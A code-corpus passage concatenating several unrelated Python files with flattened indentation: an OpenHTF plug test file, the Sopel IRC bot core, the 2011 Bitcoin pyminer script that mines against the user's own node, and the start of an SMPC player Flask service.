self.plug_manager._asdict()['plug_states']
)
self.assertEqual('CREATED', AdderPlug.LAST_INSTANCE.state)
@test.yields_phases
def test_multiple_plugs(self):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(other_plug=AdderPlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
self.assertIs(AdderPlug.LAST_INSTANCE, other_plug)
yield dummy_phase
@plugs.plug(adder_plug=AdderPlug,
other_plug=plugs.BasePlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
yield dummy_phase
@test.yields_phases
def test_plug_logging(self):
"""Test that both __init__ and other functions get the good logger."""
class LoggingPlug(plugs.BasePlug):
def __init__(self):
self.logger_seen_init = self.logger
def action(self):
self.logger_seen_action = self.logger
@plugs.plug(logger=LoggingPlug)
def dummy_phase(test_api, logger):
logger.action()
self.assertIs(logger.logger_seen_init, logger.logger_seen_action)
self.assertIs(logger.logger_seen_init, self.logger)
yield dummy_phase
def test_tear_down_raises(self):
"""Test that all plugs get torn down even if some raise."""
self.plug_manager.initialize_plugs({
TearDownRaisesPlug1, TearDownRaisesPlug2})
self.plug_manager.tear_down_plugs()
self.assertTrue(TearDownRaisesPlug1.TORN_DOWN)
self.assertTrue(TearDownRaisesPlug2.TORN_DOWN)
def test_plug_updates(self):
self.plug_manager.initialize_plugs({AdderPlug})
adder_plug_name = AdderPlug.__module__ + '.AdderPlug'
update = self.plug_manager.wait_for_plug_update(
adder_plug_name, {}, .001)
self.assertEqual({'number': 0}, update)
# No update since last time, this should time out (return None).
self.assertIsNone(self.plug_manager.wait_for_plug_update(
adder_plug_name, update, .001))
def _delay_then_update():
time.sleep(.5)
self.assertEqual(1, AdderPlug.LAST_INSTANCE.increment())
threading.Thread(target=_delay_then_update).start()
start_time = time.time()
self.assertEqual({'number': 1}, self.plug_manager.wait_for_plug_update(
adder_plug_name, update, 5))
self.assertGreater(time.time() - start_time, .2)
def test_invalid_plug(self):
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({object})
with self.assertRaises(plugs.InvalidPlugError):
plugs.plug(adder_plug=object)
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({
type('BadPlug', (plugs.BasePlug,), {'logger': None})})
with self.assertRaises(plugs.InvalidPlugError):
class BadPlugInit(plugs.BasePlug):
def __init__(self):
self.logger = None
self.plug_manager.initialize_plugs({BadPlugInit})
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.wait_for_plug_update('invalid', {}, 0)
def test_duplicate_plug(self):
with self.assertRaises(plugs.DuplicatePlugError):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(adder_plug=AdderPlug)
def dummy_phase(test, adder_plug):
pass
def test_uses_base_tear_down(self):
self.assertTrue(plugs.BasePlug().uses_base_tear_down())
self.assertTrue(DummyPlug().uses_base_tear_down())
self.assertFalse(AdderPlug().uses_base_tear_down())
self.assertFalse(AdderSubclassPlug().uses_base_tear_down())
self.assertFalse(TearDownRaisesPlug1().uses_base_tear_down())
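# --- Illustrative sketch (not part of plugs_test.py) -------------------------
# Outside the test harness, the same machinery exercised above is used by
# subclassing plugs.BasePlug and attaching it to a phase with the plugs.plug
# decorator.  CounterPlug and example_phase are made up for illustration:
from openhtf import plugs


class CounterPlug(plugs.BasePlug):
    """Tiny demo plug; OpenHTF instantiates one per test run."""

    def __init__(self):
        self.count = 0

    def bump(self):
        self.count += 1
        return self.count

    def tearDown(self):
        # Called by the PlugManager when the test run finishes.
        self.count = 0


@plugs.plug(counter=CounterPlug)
def example_phase(test_api, counter):
    # 'counter' is the shared CounterPlug instance provided by the PlugManager.
    test_api.logger.info('count is now %d', counter.bump())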
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class _CapReq(object):
def __init__(self, prefix, module, failure=None, arg=None, success=None):
def nop(bot, cap):
pass
# TODO at some point, reorder those args to be sane
self.prefix = prefix
self.module = module
self.arg = arg
self.failure = failure or nop
self.success = success or nop
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The :class:`sopel.config.Config` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
A dictionary mapping lower-cased nicks to dictionaries which map
function names to the time at which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty dict."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability names to a list of requests"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are Identifiers of the channel names, and map to
:class:`sopel.tools.target.Channel` objects which contain the users in
the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are Identifiers of the nicknames, and map to
:class:`sopel.tools.target.User` instances. In order for Sopel to be
aware of a user, it must be in at least one channel which they are also
in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.Sopel.SopelMemory`
"""
self.shutdown_methods = []
"""List of methods to call on shutdown"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.host_blocks:
self.config.core.host_blocks = []
self.setup()
@property
def hostmask(self):
"""str: the current hostmask for the bot :class:`sopel.tools.target.User`
Bot must be connected and in at least one channel.
"""
if not self.users or not self.users.contains(self.nick):
raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
return self.users.get(self.nick).hostmask
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
def write(self, args, text=None): # Shim this in here for autodocs
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args``, may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
510 characters, any remaining characters will not be sent.
"""
irc.Bot.write(self, args, text=text)
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 1: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
for func in urls:
self.register_url_callback(func.url_regex, func)
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
def say(self, text, recipient, max_messages=1):
"""Send ``text`` as a PRIVMSG to ``recipient``.
In the context of a triggered callable, the ``recipient`` defaults to
the channel (or nickname, if a private message) from which the message
was received.
By default, this will attempt to send the entire ``text`` in one
message. If the text is too long for the server, it may be truncated.
If ``max_messages`` is given, the ``text`` will be split into at most
that many messages, each no more than 400 bytes. The split is made at
the last space character before the 400th byte, or at the 400th byte if
no such space exists. If the ``text`` is too long to fit into the
specified number of messages using the above splitting, the final
message will contain the entire remainder, which may be truncated by
the server.
"""
excess = ''
if not isinstance(text, unicode):
# Make sure we are dealing with unicode string
text = text.decode('utf-8')
if max_messages > 1:
# Manage multi-line only when needed
text, excess = tools.get_sendable_message(text)
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 40)) / 70
wait = min(0.8 + penalty, 2) # Never wait more than 2 seconds
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we are about to send was repeated at least 5 times in
# the last 2 minutes, replace it with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
def call(self, func, sopel, trigger):
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded modules/modules methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed modules completely on provided channel
if 'disable_modules' in channel_config:
disabled_modules = channel_config.disable_modules.split(',')
# if "*" is used, we are disabling all modules on provided channel
if '*' in disabled_modules:
return
if func.__module__ in disabled_modules:
return
# disable chosen methods from modules
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.__module__ in disabled_commands:
if func.__name__ in disabled_commands[func.__module__]:
return
try:
exit_code = func(sopel, trigger)
except Exception: # TODO: Be specific
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1] if args else ''
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
user_obj = self.users.get(pretrigger.nick)
account = user_obj.account if user_obj else None
trigger = Trigger(self.config, pretrigger, match, account)
wrapper = SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if hasattr(func, 'intents'):
if not trigger.tags.get('intent'):
continue
match = False
for intent in func.intents:
if intent.match(trigger.tags.get('intent')):
match = True
if not match:
continue
if (trigger.nick.lower() == self.nick.lower() and
not func.echo):
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def cap_req(self, module_name, capability, arg=None, failure_callback=None,
success_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Similarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability. It will be called either if the server NAKs the request,
or if the server enabled it and later DELs it.
The `success_callback` function will be called upon acknowledgement of
the capability from the server, whether during the initial capability
negotiation, or later.
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent.arg != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent.prefix != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to register
:param callback: callable object to handle matching URLs
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if not bot.memory.contains('url_callbacks'):
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
"""
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
"""Unregister the callback for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to unregister callback
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex)
"""
if not self.memory.contains('url_callbacks'):
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks found for ``url`` matching their regex pattern
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
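# --- Illustrative sketch (not part of bot.py) --------------------------------
# say() above delegates the "split at the last space before 400 bytes" rule to
# tools.get_sendable_message.  A simplified stand-in, assuming only the
# behaviour described in say()'s docstring (not Sopel's actual implementation):
def _split_message_sketch(text, max_bytes=400):
    """Return (head, excess): head fits in max_bytes, split at the last space if any."""
    encoded = text.encode('utf-8')
    if len(encoded) <= max_bytes:
        return text, ''
    cut = encoded[:max_bytes].rfind(b' ')
    if cut == -1:
        cut = max_bytes  # no space in the first max_bytes bytes: hard cut
    head = encoded[:cut].decode('utf-8', errors='ignore')
    excess = encoded[cut:].lstrip(b' ').decode('utf-8', errors='ignore')
    return head, excess

# Example: _split_message_sketch('a' * 500) == ('a' * 400, 'a' * 100)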
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 13801
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
player.py
|
from time import sleep
from flask import Flask, jsonify
from flask_restful import Resource, Api
from multiprocessing import Process
from player_auxilliary import generate_and_compile, run_smpc_computation
import json
import argparse
parser = argparse.ArgumentParser(description='Start an SMPC player REST service.')
parser.add_argument(
'player_id',
metavar='id',
type=int,
nargs=1,
help='Specify player Id'
)
args = parser.parse_args()
player_id = args.player_id[0]
app = Flask(__name__)
api = Api(app)
